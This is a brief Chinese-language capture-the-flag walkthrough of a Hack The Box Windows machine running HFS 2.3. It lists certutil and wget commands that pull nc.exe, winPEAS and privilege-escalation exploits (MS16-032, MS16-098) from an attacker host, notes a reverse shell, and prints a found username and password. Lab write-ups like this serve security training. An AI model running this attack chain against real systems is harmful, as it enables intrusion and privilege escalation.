- URL : https://app.hackthebox.eu/machines/6
- IP : 10.129.209.84
Information Gathering
- 掃 Port
觀察 80 port- 
- HFS 2.3
尋找 Exploit
- 找到https://www.exploit-db.com/exploits/39161
- 需要準備 nc
wget https://github.com/int0x33/nc.exe/raw/master/nc.exe依照需求開 http server-python3 -m http.server 80 - 放 nc執行腳本-
收到 Reverse shell- 
取得 User flag- 
提權
systeminfo
載豌豆- certutil -urlcache -f http://10.10.16.35:8000/winPEASx64.exe winpeas.exe
執行豌豆- 
- 看到帳密
kostas kdeEjDowkS*使用 Windows-Exploit-Suggester- https://github.com/AonCyberLabs/Windows-Exploit-Suggester- 需要先裝指定版本的 xlrd
pip install xlrd==1.2.0``./windows-exploit-suggester.py --update
- 尋找推薦的 Exploit 腳本嘗試 MS16-032- wget https://www.exploit-db.com/download/39719 -O Invoke-MS16-032.ps1 
- 載腳本
certutil -urlcache -f http://10.10.16.35/Invoke-MS16-032.ps1 Invoke-MS16-032.ps1失敗- https://evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html - 看起來因為他是給 GUI 用的,需要彈出額外視窗嘗試 MS16-098- https://github.com/sensepost/ms16-098
- 載下來執行
- 成功取得 System Flag-
